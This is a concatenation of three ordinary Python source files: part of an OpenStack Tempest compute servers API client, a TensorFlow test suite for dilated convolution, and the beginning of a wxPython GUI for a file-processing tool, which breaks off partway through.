}
}
if meta is not None:
post_body['createImage']['metadata'] = meta
post_body = json.dumps(post_body)
resp, body = self.post('servers/%s/action' % str(server_id),
post_body)
return resp, body
def list_server_metadata(self, server_id):
"""Lists all metadata for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-all-metadata
"""
resp, body = self.get("servers/%s/metadata" % server_id)
body = json.loads(body)
self.validate_response(schema.list_server_metadata, resp, body)
return rest_client.ResponseBody(resp, body)
def set_server_metadata(self, server_id, meta, no_metadata_field=False):
"""Sets one or more metadata items for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#replace-metadata-items
"""
if no_metadata_field:
post_body = ""
else:
post_body = json.dumps({'metadata': meta})
resp, body = self.put('servers/%s/metadata' % server_id,
post_body)
body = json.loads(body)
self.validate_response(schema.set_server_metadata, resp, body)
return rest_client.ResponseBody(resp, body)
def update_server_metadata(self, server_id, meta):
"""Updates one or more metadata items for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#create-or-update-metadata-items
"""
post_body = json.dumps({'metadata': meta})
resp, body = self.post('servers/%s/metadata' % server_id,
post_body)
body = json.loads(body)
self.validate_response(schema.update_server_metadata,
resp, body)
return rest_client.ResponseBody(resp, body)
def show_server_metadata_item(self, server_id, key):
"""Shows details for a metadata item, by key, for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#show-metadata-item-details
"""
resp, body = self.get("servers/%s/metadata/%s" % (server_id, key))
body = json.loads(body)
self.validate_response(schema.set_show_server_metadata_item,
resp, body)
return rest_client.ResponseBody(resp, body)
def set_server_metadata_item(self, server_id, key, meta):
"""Sets a metadata item, by key, for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#create-or-update-metadata-item
"""
post_body = json.dumps({'meta': meta})
resp, body = self.put('servers/%s/metadata/%s' % (server_id, key),
post_body)
body = json.loads(body)
self.validate_response(schema.set_show_server_metadata_item,
resp, body)
return rest_client.ResponseBody(resp, body)
def delete_server_metadata_item(self, server_id, key):
"""Deletes a metadata item, by key, from a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#delete-metadata-item
"""
resp, body = self.delete("servers/%s/metadata/%s" %
(server_id, key))
self.validate_response(schema.delete_server_metadata_item,
resp, body)
return rest_client.ResponseBody(resp, body)
def stop_server(self, server_id, **kwargs):
"""Stops a running server and changes its status to SHUTOFF.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#stop-server-os-stop-action
"""
return self.action(server_id, 'os-stop', **kwargs)
def start_server(self, server_id, **kwargs):
"""Starts a stopped server and changes its status to ACTIVE.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#start-server-os-start-action
"""
return self.action(server_id, 'os-start', **kwargs)
def attach_volume(self, server_id, **kwargs):
"""Attaches a volume to a server instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#attach-a-volume-to-an-instance
"""
post_body = json.dumps({'volumeAttachment': kwargs})
resp, body = self.post('servers/%s/os-volume_attachments' % server_id,
post_body)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.attach_volume, resp, body)
return rest_client.ResponseBody(resp, body)
def update_attached_volume(self, server_id, attachment_id, **kwargs):
"""Swaps a volume attached to an instance for another volume
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#update-a-volume-attachment
"""
post_body = json.dumps({'volumeAttachment': kwargs})
resp, body = self.put('servers/%s/os-volume_attachments/%s' %
(server_id, attachment_id),
post_body)
self.validate_response(schema.update_attached_volume, resp, body)
return rest_client.ResponseBody(resp, body)
def detach_volume(self, server_id, volume_id): # noqa
"""Detaches a volume from a server instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#detach-a-volume-from-an-instance
"""
resp, body = self.delete('servers/%s/os-volume_attachments/%s' %
(server_id, volume_id))
self.validate_response(schema.detach_volume, resp, body)
return rest_client.ResponseBody(resp, body)
def show_volume_attachment(self, server_id, volume_id):
"""Return details about the given volume attachment.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#show-a-detail-of-a-volume-attachment
"""
resp, body = self.get('servers/%s/os-volume_attachments/%s' % (
server_id, volume_id))
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.show_volume_attachment, resp, body)
return rest_client.ResponseBody(resp, body)
def list_volume_attachments(self, server_id):
"""Returns the list of volume attachments for a given instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-volume-attachments-for-an-instance
"""
resp, body = self.get('servers/%s/os-volume_attachments' % (
server_id))
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.list_volume_attachments, resp, body)
return rest_client.ResponseBody(resp, body)
def add_security_group(self, server_id, **kwargs):
"""Add a security group to the server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#add-security-group-to-a-server-addsecuritygroup-action
"""
return self.action(server_id, 'addSecurityGroup', **kwargs)
def remove_security_group(self, server_id, **kwargs):
"""Remove a security group from the server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#remove-security-group-from-a-server-removesecuritygroup-action
"""
return self.action(server_id, 'removeSecurityGroup', **kwargs)
def live_migrate_server(self, server_id, **kwargs):
"""This should be called with administrator privileges.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#live-migrate-server-os-migratelive-action
"""
return self.action(server_id, 'os-migrateLive', **kwargs)
def migrate_server(self, server_id, **kwargs):
"""Migrate a server to a new host.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#migrate-server-migrate-action
"""
return self.action(server_id, 'migrate', **kwargs)
def lock_server(self, server_id, **kwargs):
"""Lock the given server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#lock-server-lock-action
"""
return self.action(server_id, 'lock', **kwargs)
def unlock_server(self, server_id, **kwargs):
"""UNlock the given server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#unlock-server-unlock-action
"""
return self.action(server_id, 'unlock', **kwargs)
def suspend_server(self, server_id, **kwargs):
"""Suspend the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#suspend-server-suspend-action
"""
return self.action(server_id, 'suspend', **kwargs)
def resume_server(self, server_id, **kwargs):
"""Un-suspend the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#resume-suspended-server-resume-action
"""
return self.action(server_id, 'resume', **kwargs)
def pause_server(self, server_id, **kwargs):
"""Pause the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#pause-server-pause-action
"""
return self.action(server_id, 'pause', **kwargs)
def unpause_server(self, server_id, **kwargs):
"""Un-pause the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#unpause-server-unpause-action
"""
return self.action(server_id, 'unpause', **kwargs)
def reset_state(self, server_id, **kwargs):
"""Reset the state of a server to active/error.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#reset-server-state-os-resetstate-action
"""
return self.action(server_id, 'os-resetState', **kwargs)
def shelve_server(self, server_id, **kwargs):
"""Shelve the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#shelve-server-shelve-action
"""
return self.action(server_id, 'shelve', **kwargs)
def unshelve_server(self, server_id, **kwargs):
"""Un-shelve the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#unshelve-restore-shelved-server-unshelve-action
"""
# NOTE(gmann): pass None as request body if nothing is requested.
# Nova started the request body check since 2.77 microversion and only
# accept AZ or None as valid req body and reject the empty dict {}.
        # Before 2.77 microversion anything is valid body as Nova does not
# check the request body but as per api-ref None is valid request
# body to pass so we do not need to check the requested microversion
# here and always default req body to None.
if not kwargs:
kwargs['body'] = {'unshelve': None}
return self.action(server_id, 'unshelve', **kwargs)
def shelve_offload_server(self, server_id, **kwargs):
"""Shelve-offload the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#shelf-offload-remove-server-shelveoffload-action
"""
return self.action(server_id, 'shelveOffload', **kwargs)
def get_console_output(self, server_id, **kwargs):
"""Get console output.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#show-console-output-os-getconsoleoutput-action
"""
return self.action(server_id, 'os-getConsoleOutput',
schema.get_console_output, **kwargs)
def get_remote_console(self, server_id, console_type, protocol, **kwargs):
"""Get a remote console.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#create-remote-console
"""
param = {
'remote_console': {
'type': console_type,
'protocol': protocol,
}
}
post_body = json.dumps(param)
resp, body = self.post("servers/%s/remote-consoles" % server_id,
post_body)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.get_remote_consoles, resp, body)
return rest_client.ResponseBody(resp, body)
def list_virtual_interfaces(self, server_id):
"""List the virtual interfaces used in an instance."""
resp, body = self.get('/'.join(['servers', server_id,
'os-virtual-interfaces']))
body = json.loads(body)
self.validate_response(schema.list_virtual_interfaces, resp, body)
return rest_client.ResponseBody(resp, body)
def rescue_server(self, server_id, **kwargs):
"""Rescue the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#rescue-server-rescue-action
"""
if self.enable_instance_password:
rescue_schema = schema.rescue_server_with_admin_pass
else:
rescue_schema = schema.rescue_server
return self.action(server_id, 'rescue', rescue_schema, **kwargs)
def unrescue_server(self, server_id):
"""Unrescue the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#unrescue-server-unrescue-action
"""
return self.action(server_id, 'unrescue')
def show_server_diagnostics(self, server_id):
"""Get the usage data for a server."""
resp, body = self.get("servers/%s/diagnostics" % server_id)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.show_server_diagnostics, resp, body)
return rest_client.ResponseBody(resp, body)
def list_instance_actions(self, server_id):
"""List the provided server action."""
resp, body = self.get("servers/%s/os-instance-actions" %
server_id)
body = json.loads(body)
self.validate_response(schema.list_instance_actions, resp, body)
return rest_client.ResponseBody(resp, body)
def show_instance_action(self, server_id, request_id):
"""Returns the action details of the provided server."""
resp, body = self.get("servers/%s/os-instance-actions/%s" %
(server_id, request_id))
body = json.loads(body)
self.validate_response(schema.show_instance_action, resp, body)
return rest_client.ResponseBody(resp, body)
def force_delete_server(self, server_id, **kwargs):
"""Force delete a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#force-delete-server-forcedelete-action
"""
return self.action(server_id, 'forceDelete', **kwargs)
def restore_soft_deleted_server(self, server_id, **kwargs):
"""Restore a soft-deleted server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#restore-soft-deleted-instance-restore-action
"""
return self.action(server_id, 'restore', **kwargs)
def reset_network(self, server_id, **kwargs):
"""Reset the Network of a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#reset-networking-on-a-server-resetnetwork-action
"""
return self.action(server_id, 'resetNetwork', **kwargs)
def inject_network_info(self, server_id, **kwargs):
"""Inject the Network Info into server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#inject-network-information-injectnetworkinfo-action
"""
return self.action(server_id, 'injectNetworkInfo', **kwargs)
def get_vnc_console(self, server_id, **kwargs):
"""Get URL of VNC console.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#get-vnc-console-os-getvncconsole-action-deprecated
"""
return self.action(server_id, "os-getVNCConsole",
schema.get_vnc_console, **kwargs)
def add_fixed_ip(self, server_id, **kwargs):
"""Add a fixed IP to server instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#add-associate-fixed-ip-addfixedip-action-deprecated
"""
return self.action(server_id, 'addFixedIp', **kwargs)
def remove_fixed_ip(self, server_id, **kwargs):
"""Remove input fixed IP from input server instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#remove-disassociate-fixed-ip-removefixedip-action-deprecated
"""
return self.action(server_id, 'removeFixedIp', **kwargs)
def list_security_groups_by_server(self, server_id):
"""Lists security groups for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-security-groups-by-server
"""
resp, body = self.get("servers/%s/os-security-groups" % server_id)
body = json.loads(body)
self.validate_response(security_groups_schema.list_security_groups,
resp, body)
return rest_client.ResponseBody(resp, body)
def list_tags(self, server_id):
"""Lists all tags for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-tags
"""
url = 'servers/%s/tags' % server_id
resp, body = self.get(url)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.list_tags, resp, body)
return rest_client.ResponseBody(resp, body)
def update_all_tags(self, server_id, tags):
"""Replaces all tags on specified server with the new set of tags.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#replace-tags
:param tags: List of tags to replace current server tags with.
"""
url = 'servers/%s/tags' % server_id
put_body = {'tags': tags}
resp, body = self.put(url, json.dumps(put_body))
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.update_all_tags, resp, body)
return rest_client.ResponseBody(resp, body)
def delete_all_tags(self, server_id):
"""Deletes all tags from the specified server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#delete-all-tags
"""
url = 'servers/%s/tags' % server_id
resp, body = self.delete(url)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.delete_all_tags, resp, body)
return rest_client.ResponseBody(resp, body)
def check_tag_existence(self, server_id, tag):
"""Checks tag existence on the server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#check-tag-existence
:param tag: Check for existence of tag on specified server.
"""
url = 'servers/%s/tags/%s' % (server_id, tag)
resp, body = self.get(url)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.check_tag_existence, resp, body)
return rest_client.ResponseBody(resp, body)
def update_tag(self, server_id, tag):
"""Adds a single tag to the server if server has no specified tag.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#add-a-single-tag
:param tag: Tag to be added to the specified server.
"""
url = 'servers/%s/tags/%s' % (server_id, tag)
resp, body = self.put(url, None)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.update_tag, resp, body)
return rest_client.ResponseBody(resp, body)
def delete_tag(self, server_id, tag):
"""Deletes a single tag from the specified server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#delete-a-single-tag
:param tag: Tag to be removed from the specified server.
"""
url = 'servers/%s/tags/%s' % (server_id, tag)
resp, body = self.delete(url)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.delete_tag, resp, body)
return rest_client.ResponseBody(resp, body)
def evacuate_server(self, server_id, **kwargs):
"""Evacuate the given server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#evacuate-server-evacuate-action
"""
if self.enable_instance_password:
evacuate_schema = schema.evacuate_server_with_admin_pass
else:
evacuate_schema = schema.evacuate_server
return self.action(server_id, 'evacuate',
evacuate_schema,
**kwargs)
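# Editor's sketch (not part of the original client): a minimal example of how
# the tag helpers above might be combined. The ``servers_client`` argument is a
# hypothetical, already-authenticated instance of this client; only methods
# defined above are called.
def _example_tag_workflow(servers_client, server_id):
    """Replace all tags, add one more, then confirm it exists (sketch only)."""
    servers_client.update_all_tags(server_id, ['web', 'prod'])
    servers_client.update_tag(server_id, 'canary')
    servers_client.check_tag_existence(server_id, 'canary')
    return servers_client.list_tags(server_id)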
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for atrous convolution functionality in tensorflow.ops.nn."""
import contextlib
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import nn_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
def upsample_filters(filters, rate):
"""Upsamples the filters by a factor of rate along the spatial dimensions.
Args:
filters: spatial_shape + [in_channels, out_channels]
Original filters.
rate: A list of len(spatial_shape) positive ints, specifying the
upsampling rate.
Returns:
filters_up: output_spatial_shape + [in_channels, out_channels].
Upsampled filters with
output_spatial_shape[i] = (spatial_shape[i] - 1) * rate[i] + 1
containing (rate[i] - 1) zeros between consecutive filter values along
spatial dimension i.
"""
num_spatial_dims = len(rate)
spatial_shape = np.array(filters.shape[:num_spatial_dims])
output_spatial_shape = (spatial_shape - 1) * rate + 1
output = np.zeros(
tuple(output_spatial_shape) + tuple(filters.shape[-2:]), filters.dtype)
output[tuple(np.s_[::rate[i]] for i in range(num_spatial_dims))] = filters
return output
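# Editor's note: a minimal sketch (not part of the original tests) of what
# upsample_filters produces. A 1-D filter with spatial shape [3] dilated with
# rate [2] has output spatial shape (3 - 1) * 2 + 1 = 5, with zeros inserted
# between the original taps. The helper is defined for illustration only and is
# not referenced by the tests.
def _upsample_filters_example():
  filters = np.array([1.0, 2.0, 3.0], dtype=np.float32).reshape([3, 1, 1])
  upsampled = upsample_filters(filters, [2])
  # upsampled[:, 0, 0] is [1.0, 0.0, 2.0, 0.0, 3.0]
  return upsampled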
class AtrousConvolutionTest(test.TestCase):
@contextlib.contextmanager
def _delay_checks(self):
"""Context manager for combining checks depending on tensor evaluations.
Each call to Session.run has some overhead, and this overhead can easily
account for the majority of the time spent in tests that call Session.run
(or Tensor.eval) many times.
This context manager provides a mechanism for registering callback functions
and associated tensors. When the context is exited, all of the tensors
associated with all of the registrations are evaluated with a single call to
Session.run, and then each registered callback function is called with the
values of its associated tensors.
Yields:
A function `add_check(check, *args, **kwargs)` where `check` is the
callback function to be invoked, and `*args` and `**kwargs` specify the
    associated Tensors. When executing eagerly, `check` is invoked immediately
    inside `add_check`; otherwise it is delayed until the context exits.
"""
checks = []
def add_check(check, *args, **kwargs):
if context.executing_eagerly():
args_val, kwargs_val = self.evaluate([args, kwargs])
check(*args_val, **kwargs_val)
else:
checks.append((check, args, kwargs))
yield add_check
if not context.executing_eagerly():
all_values = self.evaluate([[args, kwargs] for _, args, kwargs in checks])
for (check, _, _), (args, kwargs) in zip(checks, all_values):
check(*args, **kwargs)
def _test_atrous_convolution(self, add_check, input_shape, filter_shape,
dilation_rate, **kwargs):
filters = np.arange(
np.prod(filter_shape), dtype=np.float32).reshape(filter_shape)
filters_upsampled = upsample_filters(filters, dilation_rate)
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
y1 = nn_ops.convolution(
input=x, filter=filters, dilation_rate=dilation_rate, **kwargs)
y2 = nn_ops.convolution(input=x, filter=filters_upsampled, **kwargs)
def check(y1_eval, y2_eval):
self.assertAllClose(y1_eval, y2_eval, rtol=1e-2, atol=1e-2)
add_check(check, y1, y2)
@test_util.run_v1_only("b/120545219")
def test_unknown_spatial_dims_for_channel_last_format(self):
x = array_ops.placeholder(dtypes.float32, [1, None, None, 10])
w = array_ops.zeros([3, 3, 10, 20])
y = nn_ops.convolution(
x, w, "VALID", dilation_rate=[2, 2], data_format="NHWC")
self.assertEqual(y.shape.as_list(), [1, None, None, 20])
@test_util.run_v1_only("b/120545219")
def test_unknown_spatial_dims_for_channel_first_format(self):
x = array_ops.placeholder(dtypes.float32, [1, 10, None, None])
w = array_ops.zeros([3, 3, 10, 20])
y = nn_ops.convolution(
x, w, "VALID", dilation_rate=[2, 2], data_format="NCHW")
self.assertEqual(y.shape.as_list(), [1, 20, None, None])
@test_util.run_in_graph_and_eager_modes
def testAtrousConvolution2D(self):
with self._delay_checks() as add_check:
for padding in ["SAME", "VALID"]:
for height, width in [[9, 9], [9, 10]]:
for kernel_height, kernel_width in [[1, 1], [2, 2], [2, 3]]:
for dilation_rate in [[1, 1], [3, 2], [2, 1]]:
self._test_atrous_convolution(
add_check=add_check,
input_shape=[2, height, width, 2],
filter_shape=[kernel_height, kernel_width, 2, 2],
padding=padding,
dilation_rate=dilation_rate,
)
@test_util.run_in_graph_and_eager_modes
def testAtrousConvolution3D(self):
with self._delay_checks() as add_check:
for padding in ["SAME", "VALID"]:
for depth, height, width in [[9, 9, 10], [9, 10, 9]]:
          for kernel_depth, kernel_height, kernel_width in [
              [3, 3, 3], [3, 2, 2], [2, 1, 3]]:
for dilation_rate in [[1, 1, 1], [3, 3, 3], [3, 2, 3], [3, 1, 2]]:
self._test_atrous_convolution(
add_check=add_check,
input_shape=[2, depth, height, width, 2],
filter_shape=[
kernel_depth, kernel_height, kernel_width, 2, 2
],
padding=padding,
dilation_rate=dilation_rate,
)
@test_util.run_in_graph_and_eager_modes
def testAtrousConvolution1D(self):
with self._delay_checks() as add_check:
for padding in ["SAME", "VALID"]:
for width in [9, 10]:
for kernel_width in range(1, 4):
for rate in range(1, 4):
self._test_atrous_convolution(
add_check=add_check,
input_shape=[2, width, 2],
filter_shape=[kernel_width, 2, 2],
padding=padding,
dilation_rate=[rate],
)
@test_util.run_in_graph_and_eager_modes
def testAtrousConvolutionNC(self):
if test.is_gpu_available(cuda_only=True):
# "NCW" and "NCHW" formats are currently supported only on CUDA.
with test_util.device(use_gpu=True):
with self._delay_checks() as add_check:
for padding in ["SAME", "VALID"]:
self._test_atrous_convolution(
add_check=add_check,
input_shape=[2, 2, 9],
padding=padding,
filter_shape=[3, 2, 2],
dilation_rate=[2],
data_format="NCW",
)
self._test_atrous_convolution(
add_check=add_check,
input_shape=[2, 2, 9, 5],
padding=padding,
filter_shape=[3, 3, 2, 2],
dilation_rate=[2, 1],
data_format="NCHW",
)
@test_util.run_in_graph_and_eager_modes
def testAtrousSequence(self):
"""Tests optimization of sequence of atrous convolutions.
See the documentation of with_space_to_batch.
"""
with self._delay_checks() as add_check:
for padding in ["SAME", "VALID"]:
for height in range(15, 17):
for width in range(15, 17):
x_shape = [3, height, width, 2]
x = np.random.random_sample(x_shape).astype(np.float32)
kernel_sizes = [1, 3] if padding == "SAME" else range(1, 3)
for kernel in kernel_sizes:
f_shape = [kernel, kernel, 2, 2]
f1 = 1e-2 * np.random.random_sample(f_shape).astype(np.float32)
f2 = 1e-2 * np.random.random_sample(f_shape).astype(np.float32)
def combined_op(converted_input, num_spatial_dims, padding_arg): # pylint: disable=unused-argument
# pylint: disable=cell-var-from-loop
result = nn_ops.convolution(
input=converted_input, filter=f1, padding=padding)
result = nn_ops.convolution(
input=result, filter=f2, padding=padding)
# pylint: enable=cell-var-from-loop
return result
for rate_height in range(2, 4):
for rate_width in range(2, 4):
dilation_rate = [rate_height, rate_width]
y1 = nn_ops.convolution(
input=x,
filter=f1,
padding=padding,
dilation_rate=dilation_rate)
y1 = nn_ops.convolution(
input=y1,
filter=f2,
padding=padding,
dilation_rate=dilation_rate)
y2 = nn_ops.with_space_to_batch(
input=x,
dilation_rate=dilation_rate,
op=combined_op,
padding="VALID")
def check(y1_eval, y2_eval):
self.assertAllClose(y1_eval, y2_eval, rtol=1e-2, atol=1e-2)
add_check(check, y1, y2)
def _test_gradient(self, x_shape, f_shape, dilation_rate, padding):
x_val = np.random.random_sample(x_shape).astype(np.float32)
f_val = np.random.random_sample(f_shape).astype(np.float32)
x = constant_op.constant(x_val, name="x", dtype=dtypes.float32)
f = constant_op.constant(f_val, name="f", dtype=dtypes.float32)
output = nn_ops.convolution(
input=x, filter=f, dilation_rate=dilation_rate, padding=padding)
y_shape = output.get_shape().as_list()
err = gradient_checker.compute_gradient_error([x, f], [x_shape, f_shape],
output, y_shape)
err_tolerance = 1e-2
self.assertLess(err, err_tolerance)
@test_util.run_v1_only("b/120545219")
def testGradient(self):
with self.cached_session():
for padding in ["SAME", "VALID"]:
for rate_width in range(1, 3):
for rate_height in range(1, 3):
self._test_gradient(
x_shape=[2, 5, 6, 2],
f_shape=[3, 3, 2, 2],
dilation_rate=[rate_height, rate_width],
padding=padding)
if __name__ == "__main__":
test.main()
|
|
import wx
import os #needed to join paths in open/save
import threading
import copy
class mainwindow(wx.Frame):
def __init__(self, parent, title):
self.input = ['', '', '', '', '', ''] #Save user entered values
self.dirname = ''
self.filename = ''
#Creating the window, setting it blue, and adding a text box to it
wx.Frame.__init__(self, parent, title = title, size =(1000, 800))
self.SetBackgroundColour((120, 180, 255)) #light blue
self.logger = wx.TextCtrl(self, size=(300, 150),style=wx.TE_MULTILINE|\
wx.TE_RICH)
self.CreateStatusBar()
self.Bind(wx.EVT_CLOSE, self.OnExit) #bind x button
self.is_header = False
self.copy_header = False
self.is_csv = False
self.want_csv = False
self.smart_check = False
#Setting up the "File" menu option
filemenu = wx.Menu()
menuOpen = filemenu.Append(wx.ID_OPEN, "&Open", \
"Open a Text File of Points to Interpolate")
menuSave = filemenu.Append(wx.ID_SAVE, \
"&Save", "Select a Text File for Output")
menuAbout = filemenu.Append(wx.ID_ABOUT, "&About", \
"Information About the Program")
filemenu.AppendSeparator()
menuExit = filemenu.Append(wx.ID_EXIT,"&Exit","Terminate the Program")
self.Bind(wx.EVT_MENU, self.OnOpen, menuOpen)
self.Bind(wx.EVT_MENU, self.OnSave, menuSave)
self.Bind(wx.EVT_MENU, self.OnAbout, menuAbout)
self.Bind(wx.EVT_MENU, self.OnExit, menuExit)
#Setting up the "Help" menu option
helpmenu = wx.Menu()
self.menuHelp = helpmenu.Append(wx.ID_HELP, "&Help", \
"Help on Using the Program")
self.Bind(wx.EVT_MENU, self.OnHelp, self.menuHelp)
#Creating File MenuBar
menubar = wx.MenuBar()
menubar.Append(filemenu, "&File")
menubar.Append(helpmenu, "&Help")
self.SetMenuBar(menubar)
#Create Sizers
mainSizer = wx.BoxSizer(wx.VERTICAL)
grid = wx.GridBagSizer(hgap=7, vgap=3)
hSizer = wx.BoxSizer(wx.HORIZONTAL)
#Input File Box
self.input_text = wx.StaticText(self, label = "Input File Name:")
self.input_box = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.input_text, pos = (0, 0))
grid.Add(self.input_box, pos = (1, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 0), \
self.input_box)
self.make_bold(self.input_text)
self.make_bold(self.input_box)
#Browse Button Points
self.browse_button_input = wx.Button(self, label = "Browse..")
self.Bind(wx.EVT_BUTTON, self.OnOpen, self.browse_button_input)
self.make_bold(self.browse_button_input)
grid.Add(self.browse_button_input, pos = (2, 0))
#Output File Box
self.output_text = wx.StaticText(self, label = "Output File Name:")
self.output_box = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.output_text, pos = (0, 1))
grid.Add(self.output_box, pos = (1, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 1), \
self.output_box)
self.make_bold(self.output_text)
self.make_bold(self.output_box)
#Browse Button Output
self.browse_button_out = wx.Button(self, label = "Browse..")
self.Bind(wx.EVT_BUTTON, self.OnSave, self.browse_button_out)
self.make_bold(self.browse_button_out)
grid.Add(self.browse_button_out, pos = (2, 1))
#Number of Lines
self.num_lines_prompt = wx.StaticText(\
self,label="Number of lines: ")
self.num_lines = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.num_lines_prompt, pos = (3, 0))
grid.Add(self.num_lines, pos = (4, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 4), self.num_lines)
self.make_bold(self.num_lines)
self.make_bold(self.num_lines_prompt)
#Filter
self.filter_prompt = wx.StaticText(\
self,label="Filter: ")
self.filter = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.filter_prompt, pos = (3, 1))
grid.Add(self.filter, pos = (4, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 5), self.filter)
self.make_bold(self.filter_prompt)
self.make_bold(self.filter)
#Input format
self.in_format_prompt = wx.StaticText(self,label="Input File Format: ")
self.in_format = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.in_format_prompt, pos = (5, 0))
grid.Add(self.in_format, pos = (6, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 2), self.in_format)
self.make_bold(self.in_format_prompt)
#Output Format
self.out_format_prompt= wx.StaticText(self,label="Output File Format: ")
self.out_format = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.out_format_prompt, pos = (5, 1))
grid.Add(self.out_format, pos = (6, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 3), self.out_format)
self.make_bold(self.out_format_prompt)
#Create Checkbox
self.header_check = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Has Header")
grid.Add(self.header_check, pos = (7, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckHead, self.header_check)
